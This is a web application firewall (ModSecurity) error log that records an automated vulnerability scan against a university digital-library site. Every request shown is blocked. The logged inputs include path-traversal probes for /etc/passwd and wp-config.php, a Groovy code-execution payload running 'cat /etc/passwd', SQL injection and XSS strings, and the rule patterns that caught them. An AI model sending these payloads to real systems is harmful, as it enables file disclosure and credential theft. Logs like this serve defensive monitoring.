[Tue Aug 29 11:47:47.426962 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAjM7HAAAAAT"]
[Tue Aug 29 11:47:48.436122 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAkdu3UAAAAO"]
[Tue Aug 29 11:47:48.486092 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAj119oAAAAa"]
[Tue Aug 29 11:47:49.564041 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAjCbLQAAAAB"]
[Tue Aug 29 11:47:49.571113 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAjrbKQAAAAP"]
[Tue Aug 29 11:47:50.358967 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkaC@sAAAAJ"]
[Tue Aug 29 11:47:50.365289 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAhT4C0AAAAD"]
[Tue Aug 29 11:47:50.400758 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14dsCo-f0AAAi2yLAAAAAN"]
[Tue Aug 29 11:47:50.435651 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAj11@EAAAAa"]
[Tue Aug 29 11:47:51.419291 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "digilib.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAjqDFUAAAAH"]
[Tue Aug 29 11:47:51.420901 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAkdu4IAAAAO"]
[Tue Aug 29 11:47:52.474989 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjM7HUAAAAT"]
[Tue Aug 29 11:47:52.521121 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAkGCUIAAAAE"]
[Tue Aug 29 11:47:53.432770 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAjqDF8AAAAH"]
[Tue Aug 29 11:47:56.507681 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAj11-kAAAAa"]
[Tue Aug 29 11:47:57.472455 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAjM7IkAAAAT"]
[Tue Aug 29 11:47:58.432579 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAjCbNIAAAAB"]
[Tue Aug 29 11:47:58.433327 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAkdu5wAAAAO"]
[Tue Aug 29 11:47:59.365132 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAjy52kAAAAG"]
[Tue Aug 29 11:48:02.456008 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAkAL@YAAAAU"]
[Tue Aug 29 11:48:03.363706 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAkNPsAAAAAI"]
[Tue Aug 29 11:48:04.441028 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkdu7wAAAAO"]
[Tue Aug 29 11:48:04.450764 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hMCo-f0AAAj12BYAAAAa"]
[Tue Aug 29 11:48:05.448119 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilib.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAjbw7EAAAAW"]
[Tue Aug 29 11:48:06.359953 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAklewcAAAAD"]
[Tue Aug 29 11:48:06.410350 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAkaDBoAAAAJ"]
[Tue Aug 29 11:48:07.463244 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAkdu8oAAAAO"]
[Tue Aug 29 11:48:08.359917 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjy56AAAAAG"]
[Tue Aug 29 11:48:09.385114 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAjYrCsAAAAK"]
[Tue Aug 29 11:48:09.470988 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAkAL-kAAAAU"]
[Tue Aug 29 11:48:11.429759 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAjtc7gAAAAX"]
[Tue Aug 29 11:48:12.375760 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAkksJcAAAAA"]
[Tue Aug 29 11:48:12.423551 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAkksJkAAAAA"]
[Tue Aug 29 11:48:12.595652 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilib.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAkoTgQAAAAH"]
[Tue Aug 29 11:48:12.595710 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAkoTgQAAAAH"]
[Tue Aug 29 11:48:17.737414 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAkAMEgAAAAU"]
